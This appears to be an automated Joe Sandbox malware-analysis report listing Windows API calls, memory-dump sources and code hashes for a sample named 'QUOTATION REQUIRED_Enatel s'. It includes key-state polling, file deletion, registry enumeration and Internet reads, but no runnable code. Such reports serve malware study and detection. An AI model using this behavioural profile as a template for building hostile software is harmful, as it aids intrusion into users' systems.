• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F53CDE,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14E62
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F14E74
• FreeLibrary.KERNEL32(00000000,?,?,00F53CDE,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14E87
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F82C05
• DeleteFileW.KERNEL32(?), ref: 00F82C87
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F82C9D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F82CAE
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F82CC0
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: File$Delete$Copy
• String ID:
• API String ID: 3226157194-0
APIs
• GetCurrentProcessId.KERNEL32 ref: 00F9A427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F9A435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F9A468
• CloseHandle.KERNEL32(?), ref: 00F9A63D
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00FB3700), ref: 00F4BB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,00FE121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00F4BC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,00FE1270,000000FF,?,0000003F,00000000,?), ref: 00F4BC36
• _free.LIBCMT ref: 00F4BB7F
  • Part of subcall function 00F429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000), ref: 00F429DE
  • Part of subcall function 00F429C8: GetLastError.KERNEL32(00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000,00000000), ref: 00F429F0
• _free.LIBCMT ref: 00F4BD4B
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0
APIs
  • Part of subcall function 00F7DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F7CF22,?), ref: 00F7DDFD
  • Part of subcall function 00F7DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F7CF22,?), ref: 00F7DE16
  • Part of subcall function 00F7E199: GetFileAttributesW.KERNEL32(?,00F7CF95), ref: 00F7E19A
• lstrcmpiW.KERNEL32(?,?), ref: 00F7E473
• MoveFileW.KERNEL32(?,?), ref: 00F7E4AC
• _wcslen.LIBCMT ref: 00F7E5EB
• _wcslen.LIBCMT ref: 00F7E603
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00F7E650
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
                                                                                                                    • Opcode ID: c247f67206c1c9bf041d30746d1caa81e4811fef2ccebcb11a3686a4f025ecab
                                                                                                                    • Instruction ID: f0228a570fbe5e6917cea122c957e7ebed187c7daac9480866e804a4f2f6833e
                                                                                                                    • Opcode Fuzzy Hash: c247f67206c1c9bf041d30746d1caa81e4811fef2ccebcb11a3686a4f025ecab
                                                                                                                    • Instruction Fuzzy Hash: A45182B24083455BC724DBA0DC819DB73ECAF89350F40495FF689D3151EF78A68897A7
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F9C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9B6AE,?,?), ref: 00F9C9B5
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9C9F1
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9CA68
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9CA9E
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9BAA5
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9BB00
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F9BB63
                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00F9BBA6
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F9BBB3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 826366716-0
                                                                                                                    • Opcode ID: 667b21b63dbe9f4ea444b7b118d62f1da1c31fbb2c342286598ce1cb0317b978
                                                                                                                    • Instruction ID: 3ba1510d97d4a93acb2b7bd66584dab5661794d397a29b5c8db884535c0632e0
                                                                                                                    • Opcode Fuzzy Hash: 667b21b63dbe9f4ea444b7b118d62f1da1c31fbb2c342286598ce1cb0317b978
                                                                                                                    • Instruction Fuzzy Hash: 93610331208201EFD714DF14C990E6ABBE5FF84318F54855CF4998B2A2CB35ED45EB92
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00F78BCD
                                                                                                                    • VariantClear.OLEAUT32 ref: 00F78C3E
                                                                                                                    • VariantClear.OLEAUT32 ref: 00F78C9D
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F78D10
                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F78D3B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4136290138-0
                                                                                                                    • Opcode ID: 7258c0001794f6ef9a1bce8014884e5fb29675c947862ca625af0e134cb53dfa
                                                                                                                    • Instruction ID: b80a6096ec71ec63efff95841d39dc9a57775f1b230c49e18cf4b2a489bc8854
                                                                                                                    • Opcode Fuzzy Hash: 7258c0001794f6ef9a1bce8014884e5fb29675c947862ca625af0e134cb53dfa
                                                                                                                    • Instruction Fuzzy Hash: 13515CB5A00219EFCB14CF58C894AAAB7F8FF8D350B15855AE909DB350E730E912CF90
                                                                                                                    APIs
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F88BAE
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00F88BDA
                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F88C32
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F88C57
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F88C5F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2832842796-0
                                                                                                                    • Opcode ID: dd2970dfc1ee20f703a81dd6b9ef84b204deafd1b8a44ca4324029adf278d168
                                                                                                                    • Instruction ID: 0b4515366b7a140421ee5182fd63271009eeda2b0e3512ceda61e30a5101ce95
                                                                                                                    • Opcode Fuzzy Hash: dd2970dfc1ee20f703a81dd6b9ef84b204deafd1b8a44ca4324029adf278d168
                                                                                                                    • Instruction Fuzzy Hash: E1514C35A002199FCB05EF64C881AADBBF5FF49314F088458E849AB362DB35ED51EB90
                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00F98F40
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F98FD0
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F98FEC
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F99032
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00F99052
                                                                                                                      • Part of subcall function 00F2F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00F81043,?,761DE610), ref: 00F2F6E6
                                                                                                                      • Part of subcall function 00F2F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00F6FA64,00000000,00000000,?,?,00F81043,?,761DE610,?,00F6FA64), ref: 00F2F70D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 666041331-0
                                                                                                                    • Opcode ID: 686d0966f9acac9c72bdd1aaaa2182bc5502bc02588e27fafb8586f31f4974a4
                                                                                                                    • Instruction ID: 3313db446366584ca3b47eeffaad73f60e866fbd4676b1fbb5bfbee6241dec4a
                                                                                                                    • Opcode Fuzzy Hash: 686d0966f9acac9c72bdd1aaaa2182bc5502bc02588e27fafb8586f31f4974a4
                                                                                                                    • Instruction Fuzzy Hash: E4517E35A04205DFDB04DF68C4949ADBBF1FF49324F098098E8169B362DB35ED86EB90
                                                                                                                    APIs
                                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00FA6C33
                                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00FA6C4A
                                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00FA6C73
                                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00F8AB79,00000000,00000000), ref: 00FA6C98
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00FA6CC7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3688381893-0
                                                                                                                    • Opcode ID: 7b0fde73949a813cc12e9048f274a942489635dcf65d2c8532b34c4317e13134
                                                                                                                    • Instruction ID: 4a98de6547877b313be1c0d044f8e8edab37c3a6fda8f13159b9b8e42679355c
                                                                                                                    • Opcode Fuzzy Hash: 7b0fde73949a813cc12e9048f274a942489635dcf65d2c8532b34c4317e13134
                                                                                                                    • Instruction Fuzzy Hash: 1541B3B5A04104AFD724DF28CC54FA97BA5EB4B371F190228F899E73E1C771AD41EA90
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 269201875-0
                                                                                                                    • Opcode ID: e90b4c5450ba9fca056c180131fb1adb18f949755dcc60ceab6c5c4b678f5322
                                                                                                                    • Instruction ID: 949b84ccbfb469b3f0ed13d846292349a6fa70420d07fdab38fa0299f1efc3f0
                                                                                                                    • Opcode Fuzzy Hash: e90b4c5450ba9fca056c180131fb1adb18f949755dcc60ceab6c5c4b678f5322
                                                                                                                    • Instruction Fuzzy Hash: 7C41CF32E002049BCB20DF78C880A5EBBF5EF88720F5545B9F915EB356DA31AD01EB80
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 00F29141
                                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00F2915E
                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00F29183
                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00F2919D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                    • String ID:
• API String ID: 4210589936-0
• Opcode ID: c54ae6fedf47dd71d28d97f74801bd10680afdbcce07c4ca5f7455a62442829b
• Instruction ID: d1f832c04f5ea1d067020f69b7517d3ac56fa7464b02ac55716350fc2c3d8cdb
• Opcode Fuzzy Hash: c54ae6fedf47dd71d28d97f74801bd10680afdbcce07c4ca5f7455a62442829b
• Instruction Fuzzy Hash: 22416071A0861ABBDF15AF69D844BEEB774FB06334F204216E429A32D0C7746950EF91

APIs
• GetInputState.USER32 ref: 00F838CB
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 00F83922
• TranslateMessage.USER32(?), ref: 00F8394B
• DispatchMessageW.USER32(?), ref: 00F83955
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F83966
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID:
• API String ID: 2256411358-0
• Opcode ID: 81b44b6f4f1d8f5e430c0c0a0cc7de65d74bcef42fe7e199b870119217987b39
• Instruction ID: d622f3cc50b63c73b271d05c017ae446d4f7333896912d891ac6d8afd310c50c
• Opcode Fuzzy Hash: 81b44b6f4f1d8f5e430c0c0a0cc7de65d74bcef42fe7e199b870119217987b39
• Instruction Fuzzy Hash: E631E571D043899EEB35EB35DC88BF637A9EB05B10F04056DE466860B0E7F4AA85FB11

APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00F8C21E,00000000), ref: 00F8CF38
• InternetReadFile.WININET(?,00000000,?,?), ref: 00F8CF6F
• GetLastError.KERNEL32(?,00000000,?,?,?,00F8C21E,00000000), ref: 00F8CFB4
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00F8C21E,00000000), ref: 00F8CFC8
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00F8C21E,00000000), ref: 00F8CFF2
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
• Opcode ID: 39fd04e73c5ba3cc13062348df38ba248550f906e783bb9f706395ff136bd881
• Instruction ID: 548d1dbe377123704a8411f47e8144a08ac2a23d3c1c6ad482403b65f1ef4619
• Opcode Fuzzy Hash: 39fd04e73c5ba3cc13062348df38ba248550f906e783bb9f706395ff136bd881
• Instruction Fuzzy Hash: 703150B1904205EFEB20EFA5D884AABBBF9EF15354B10442EF616D2140DB34AD45EBB0

APIs
• GetWindowRect.USER32(?,?), ref: 00F71915
• PostMessageW.USER32(00000001,00000201,00000001), ref: 00F719C1
• Sleep.KERNEL32(00000000,?,?,?), ref: 00F719C9
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00F719DA
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 00F719E2
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 80c336edc8980b731f77da87044fa76230072befd0fb8b78124e8113e84965ab
• Instruction ID: bcfb8134c6e06e463f76445e7a0f9dee151ca9cc69270981d7245a49ca3e27e6
• Opcode Fuzzy Hash: 80c336edc8980b731f77da87044fa76230072befd0fb8b78124e8113e84965ab
• Instruction Fuzzy Hash: A231C171A00219EFCB10CFACCD58ADE3BB5FB05324F008226FA25A72D1C3709959EB91

APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00FA5745
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00FA579D
• _wcslen.LIBCMT ref: 00FA57AF
• _wcslen.LIBCMT ref: 00FA57BA
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00FA5816
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: MessageSend$_wcslen
• String ID:
• API String ID: 763830540-0
• Opcode ID: 3f157750d41b12af5d864cfe9a07a849c1ba192d6529c9016715ba975d796eab
• Instruction ID: 137cdc5c9156619572a6f8f258312bc2f6cb843d5848bf5b7c96d8c832c72de8
• Opcode Fuzzy Hash: 3f157750d41b12af5d864cfe9a07a849c1ba192d6529c9016715ba975d796eab
• Instruction Fuzzy Hash: AC2185B5D04618DADB20DFA0CC85AEE77B8FF06B34F108216F919EA180D7749985EF91

APIs
• IsWindow.USER32(00000000), ref: 00F90951
• GetForegroundWindow.USER32 ref: 00F90968
• GetDC.USER32(00000000), ref: 00F909A4
• GetPixel.GDI32(00000000,?,00000003), ref: 00F909B0
• ReleaseDC.USER32(00000000,00000003), ref: 00F909E8
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
